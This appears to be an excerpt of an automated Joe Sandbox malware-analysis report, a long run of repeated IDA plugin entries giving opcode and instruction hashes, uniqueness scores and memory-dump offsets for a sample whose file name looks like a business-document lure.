                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ae9d9324d7a5cc0897f971d63994ce60a8a55c0cb57a888e7b4cb2307896687f
                                                                                                                                                    • Instruction ID: 2845de10094ec59879d94e54b530b7f3e0823fb3cb0a1f05cb8107477870da49
                                                                                                                                                    • Opcode Fuzzy Hash: ae9d9324d7a5cc0897f971d63994ce60a8a55c0cb57a888e7b4cb2307896687f
                                                                                                                                                    • Instruction Fuzzy Hash: A40192317003049FD7299B38D414A7E37A2ABC5324F18866DEA164B7E0CB75DC42CB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 996969639bd3135bb628c5b39763dfeb9865656ff4cd6d0145b3de9b0fc7d886
                                                                                                                                                    • Instruction ID: 508218025baf448a8812f954fb69dd9a9abad55eaaf39e01fef150d1b603549e
                                                                                                                                                    • Opcode Fuzzy Hash: 996969639bd3135bb628c5b39763dfeb9865656ff4cd6d0145b3de9b0fc7d886
                                                                                                                                                    • Instruction Fuzzy Hash: F8015E31700704DFD7299B38D458A3A7BA3BBC5364F18966CEA564B794CB76EC42C780
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 570b3cf8493cbe2df3c6509d243442e88f96a7cae287bd751ced703217a8188b
                                                                                                                                                    • Instruction ID: b5338de395896f1283c9bc813f0ce7e8f30fba29a75fc8d8db601ebee7bb7c6f
                                                                                                                                                    • Opcode Fuzzy Hash: 570b3cf8493cbe2df3c6509d243442e88f96a7cae287bd751ced703217a8188b
                                                                                                                                                    • Instruction Fuzzy Hash: 37018C36E10608DFCB10EFA9D5089DEBBF4FF89720B10826AD515A32A0EB309A05CF51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: bed57ecde3b9372ac2e87db3386cf548568987caf01d1abf21c716f63aa1d436
                                                                                                                                                    • Instruction ID: 32c9df4d5c0d3bd25b3cc7496d603580805513e4abc9914ef7f05857c461445e
                                                                                                                                                    • Opcode Fuzzy Hash: bed57ecde3b9372ac2e87db3386cf548568987caf01d1abf21c716f63aa1d436
                                                                                                                                                    • Instruction Fuzzy Hash: 2AF0FC72F057116FE71496196C0876EB7A5DFC5330F20456DD5059B3D0EA62AC458B90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 71c7f10919bf353819f03264a93ac5860410c69062fa28d953f4b5edec1adf33
                                                                                                                                                    • Instruction ID: 892fb6ba3bb303c07aa66cfcfd0b732ca432b0e6e1e574326ece7b88e0538a70
                                                                                                                                                    • Opcode Fuzzy Hash: 71c7f10919bf353819f03264a93ac5860410c69062fa28d953f4b5edec1adf33
                                                                                                                                                    • Instruction Fuzzy Hash: 35017135E04349DFCF41EFB4D8585ED7BB0EF54305B5040AAD446E76A1EB740A46CB82
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 119d757c17a3df330242771ab9ee4edb221960b83b4c83b41f87019d1c22b039
                                                                                                                                                    • Instruction ID: 9e8aae69b58a9ae2000855f6405e4ea87eefbea023e4ac25fe9836f1b529ed52
                                                                                                                                                    • Opcode Fuzzy Hash: 119d757c17a3df330242771ab9ee4edb221960b83b4c83b41f87019d1c22b039
                                                                                                                                                    • Instruction Fuzzy Hash: DB11D274A0422CCFCB15EF64D95479DB7B1EB58300F1081BA944AA7394DBB85EC5CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 48c123acd7c5f40708d7bfb8da1ced82395f5dc4e1e6dfac3c0834598a076001
                                                                                                                                                    • Instruction ID: a5fca9272bedc2e2b6d26043e900e2d6e41a1c3ad8f23608a25951e80668124e
                                                                                                                                                    • Opcode Fuzzy Hash: 48c123acd7c5f40708d7bfb8da1ced82395f5dc4e1e6dfac3c0834598a076001
                                                                                                                                                    • Instruction Fuzzy Hash: 3EF089A17052636FE6C992E44C517BE119A8BC9F50F51406DF34DEB2C5CE196D02437B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3e49055ec846998d65a7a5a349a2d6dcbcbcb01b45d418fd81075fe770a63807
                                                                                                                                                    • Instruction ID: 44d1a81b2f82fad51b72f1632d35397a307ffeb49c8d9753170ce3de1e54a1e3
                                                                                                                                                    • Opcode Fuzzy Hash: 3e49055ec846998d65a7a5a349a2d6dcbcbcb01b45d418fd81075fe770a63807
                                                                                                                                                    • Instruction Fuzzy Hash: ED012835E00619DFCB00EFA9D50499EBBF5FF89711B108169E619A3350EB30AA05CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2bcb8a432ca5527db2c7a6f6884b7b766c07d31bfa34c307e2f6cef1f8677032
                                                                                                                                                    • Instruction ID: 53c88ece2e1558360d1f027ea46efc45fbf9278228f905cbf4ccd56bf3924f6e
                                                                                                                                                    • Opcode Fuzzy Hash: 2bcb8a432ca5527db2c7a6f6884b7b766c07d31bfa34c307e2f6cef1f8677032
                                                                                                                                                    • Instruction Fuzzy Hash: 31F02B72F047116FE7248619A80876EF7A5EBC9330F20457DE5099B3D0DB72AC418B90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b8c6c6eda62899d024097703fe7e3b291605afe32d6e90389c0e0da7e7485bc4
                                                                                                                                                    • Instruction ID: eac4606f8ba143c18b8cfc9859e69329e58934520aa2cda7af40b53a2b30abac
                                                                                                                                                    • Opcode Fuzzy Hash: b8c6c6eda62899d024097703fe7e3b291605afe32d6e90389c0e0da7e7485bc4
                                                                                                                                                    • Instruction Fuzzy Hash: F7F06D6284D3C84FCB539B6058600CC3FB06E2333030E42EFC9988A8E3E5280859C763
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 063d678b87fc43fe193d618cca7587c7e95e6a2e1c43bd14f2d224421ad5164a
                                                                                                                                                    • Instruction ID: 560f53475c5447217b3e00a4cb11179d2b89e5e9ee6deb1750d8c4a25377450a
                                                                                                                                                    • Opcode Fuzzy Hash: 063d678b87fc43fe193d618cca7587c7e95e6a2e1c43bd14f2d224421ad5164a
                                                                                                                                                    • Instruction Fuzzy Hash: 980144393009119FC7199B25D514A1E77A7FFCC711B104129EA0A8B7A5CF71EC42CBD5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d4fa97fc803bab57254e23c54871366aecc796b5d6d99216344809fbabd9b92e
                                                                                                                                                    • Instruction ID: 4a8ab2cfc224cccdfe3cc9df229b65624ad291d41545afd129cff281e57f1575
                                                                                                                                                    • Opcode Fuzzy Hash: d4fa97fc803bab57254e23c54871366aecc796b5d6d99216344809fbabd9b92e
                                                                                                                                                    • Instruction Fuzzy Hash: 14012C70D09249DFCB45CFB8D9442AEBFF4EB09300F1045EAC419E32A5D7354A45CB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 799e81c2efcea1319ace26bff6da5b2ea21cfb9b164d4a0ea55f4a950c253e54
                                                                                                                                                    • Instruction ID: 2d925e9505898641382174d9a87f97ab07bf31c509b00fd523c1f9289c16b01f
                                                                                                                                                    • Opcode Fuzzy Hash: 799e81c2efcea1319ace26bff6da5b2ea21cfb9b164d4a0ea55f4a950c253e54
                                                                                                                                                    • Instruction Fuzzy Hash: 97F02BA2B0D6901FE72243296C19325ABA19B97310F2844EBD1418F3D2E956EC16C350
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0e426df893fef23f50f731f8e1aba3980e7af08aa5f60a76c3a7987432488ebb
                                                                                                                                                    • Instruction ID: 0ea3e0a5022225f471c560052acecd2438bf2267bd9c9081ac2b135105561509
                                                                                                                                                    • Opcode Fuzzy Hash: 0e426df893fef23f50f731f8e1aba3980e7af08aa5f60a76c3a7987432488ebb
                                                                                                                                                    • Instruction Fuzzy Hash: 08014B307006498BCF06EBA8C851AADB7B2FF883043158969E409AB356DB75ED438FD1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c689dab00b5bc95fbc1e5f1ecc3b7a097845d9d70bd8538c3b928572f1478490
                                                                                                                                                    • Instruction ID: 8f1be3024c29729172c55080bb9bea6ce9c50316436758b4591d95de5e52aeac
                                                                                                                                                    • Opcode Fuzzy Hash: c689dab00b5bc95fbc1e5f1ecc3b7a097845d9d70bd8538c3b928572f1478490
                                                                                                                                                    • Instruction Fuzzy Hash: E7F05931B047152FE71486199C1872BF7A9EBC9720F20402DE5099B380DA72FC0187D0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5428761b2441fe6a4e6851555feee6cc350de1018ad9f29b15f57d88d62c4a74
                                                                                                                                                    • Instruction ID: 744bdb406ddbf83be9f0b9458f689e6b30de7d84d2728547b749b978e3bb53d3
                                                                                                                                                    • Opcode Fuzzy Hash: 5428761b2441fe6a4e6851555feee6cc350de1018ad9f29b15f57d88d62c4a74
                                                                                                                                                    • Instruction Fuzzy Hash: 98F0346284E3C88FC7539B60586058C3FB06E2323034E47EFC9A88A4E3E5280869C733
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 59d602e6b3a6a36df2ed97b97ff9c4c3b97e1a014286c71e50de6761cf47b321
                                                                                                                                                    • Instruction ID: 5b6d5a5795e95c13aa00c2ea6ece2331d2f39a2e39a5ecbbb8bab2258510748e
                                                                                                                                                    • Opcode Fuzzy Hash: 59d602e6b3a6a36df2ed97b97ff9c4c3b97e1a014286c71e50de6761cf47b321
                                                                                                                                                    • Instruction Fuzzy Hash: 94F082B6300A049F87049F6AD884D8E77F9FF99724320846AF91AC7321DA71EC15CB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3036c82ffdfb7137b36e37ff70995e594c48a2d8bbdc3d89d47434ec7b733d3c
                                                                                                                                                    • Instruction ID: 276fba3ef7ca3b880607968c9b538d8bc9d4058041828a363554619430d00a82
                                                                                                                                                    • Opcode Fuzzy Hash: 3036c82ffdfb7137b36e37ff70995e594c48a2d8bbdc3d89d47434ec7b733d3c
                                                                                                                                                    • Instruction Fuzzy Hash: 62F0B435A04608AFCB19CF69D8883DD7FF6EF41210F0584A6D005D3244DB746A86CB44
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 66a6a72df31a7c51f7eab7020d3493a1acc45decba0d08a2161862f44d2c5f36
                                                                                                                                                    • Instruction ID: bbfd7452ef93ea926d62eb2b006775af97a5159d287cc2b306eae273fce6b287
                                                                                                                                                    • Opcode Fuzzy Hash: 66a6a72df31a7c51f7eab7020d3493a1acc45decba0d08a2161862f44d2c5f36
                                                                                                                                                    • Instruction Fuzzy Hash: A901FB35E00209DFCB44EBB4D9185EDBBB1EF44306B5044A5D816E7650EF745A85CB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 14211814dc57ce235e857530cafcf3202aeed1027e54b212e8048d6525bab16a
                                                                                                                                                    • Instruction ID: 4cdf93b9515b228e5d0e49a21b19541cf07bf012b7f967d1bc7eba1daeadc79e
                                                                                                                                                    • Opcode Fuzzy Hash: 14211814dc57ce235e857530cafcf3202aeed1027e54b212e8048d6525bab16a
                                                                                                                                                    • Instruction Fuzzy Hash: 7411C574E04268CFCBA5DF64D89479DBBB2FB48300F1082AAD55AA73A4CB745E81CF51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d18e12cae089756164b87aadd87838f2f76fe8d432f7520b79ef85d97ee7bbdb
                                                                                                                                                    • Instruction ID: f590b7e31a102b3940bfa789aa4af142130cd5affc748da48d542749d2a4eb9e
                                                                                                                                                    • Opcode Fuzzy Hash: d18e12cae089756164b87aadd87838f2f76fe8d432f7520b79ef85d97ee7bbdb
                                                                                                                                                    • Instruction Fuzzy Hash: 37F0BE7580A3449FCB01CFA8D8514A9BF74EB87310F2581EAC9489B366E6334916DB92
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 97e81b15f2930f3c7c374e6f6170255fd58f416acebfcf24e039d35e54a91906
                                                                                                                                                    • Instruction ID: 399af356f9646491d8b60a56498c744078010d2bbea8baed0ff97e0b52613dcb
                                                                                                                                                    • Opcode Fuzzy Hash: 97e81b15f2930f3c7c374e6f6170255fd58f416acebfcf24e039d35e54a91906
                                                                                                                                                    • Instruction Fuzzy Hash: D201A970D06389DFDB01CF98D1887AC7BF1FB0A310F804055E10AAB26ACB768988CF01
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0dae9b97d785755240baa8dddab3df3ca3c6d3882402b9b71b183f40cfa77da8
                                                                                                                                                    • Instruction ID: 6142167c1f8120a0e912bc19abb544a06fcf5e9ff8d59616fbe0be5b1b91480a
                                                                                                                                                    • Opcode Fuzzy Hash: 0dae9b97d785755240baa8dddab3df3ca3c6d3882402b9b71b183f40cfa77da8
                                                                                                                                                    • Instruction Fuzzy Hash: 57017870A41258CFEB21CF54D888BACBBB2FB48345F4091EAD909A72A0CB741EC5CF00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c4bd2a9b8f9de8fc2565862e4900b75955074ec9ae23e383e7021bb97435d583
                                                                                                                                                    • Instruction ID: 826a29a07995a785dfa0097d9583dcf2bea6f6177e0bb0873146e3763d410196
                                                                                                                                                    • Opcode Fuzzy Hash: c4bd2a9b8f9de8fc2565862e4900b75955074ec9ae23e383e7021bb97435d583
                                                                                                                                                    • Instruction Fuzzy Hash: 74F03A76300B019F87148F29E884C9E77A9BBD9720320816AE916C7320DA70DC15CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4dbbec2562c8d4724b4ee41f6569f241d2a9c0027c47b9978fb0861a931791f3
                                                                                                                                                    • Instruction ID: a6157b30125fff6cc70bb1f8fc6d6761b81689621e7ed216064458bebfd624ac
                                                                                                                                                    • Opcode Fuzzy Hash: 4dbbec2562c8d4724b4ee41f6569f241d2a9c0027c47b9978fb0861a931791f3
                                                                                                                                                    • Instruction Fuzzy Hash: 73F0FE393406019FC714DB69D854D2E77AAFFC9B21B154069FA468B364CB71EC42DB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 11c3fb75bfecb9c8c4a40e911e5478218b8f16697d7566fce5ee99078e6094a0
                                                                                                                                                    • Instruction ID: 7b5970294a4a584bb65f723a19da9ace8153bd8fb32e78da1738f163bcf76696
                                                                                                                                                    • Opcode Fuzzy Hash: 11c3fb75bfecb9c8c4a40e911e5478218b8f16697d7566fce5ee99078e6094a0
                                                                                                                                                    • Instruction Fuzzy Hash: 74F02731C09208DFCB01CF68D8016ACBF78EB86300F0481EEDA0457392D2335A42CB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0f2a3b2adee34b27b54f77b3b4093c6e21559162aff2edfe4113731c5bbceae0
                                                                                                                                                    • Instruction ID: 71984727e71015f9aa9ac9f3dfebb290478ce5e7cafff59f41e061e76f293845
                                                                                                                                                    • Opcode Fuzzy Hash: 0f2a3b2adee34b27b54f77b3b4093c6e21559162aff2edfe4113731c5bbceae0
                                                                                                                                                    • Instruction Fuzzy Hash: DAF0B830D09248EFCB82CFB8D8556DCBFB0EB4A300F0481EAC841AB351E6380A55CF81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
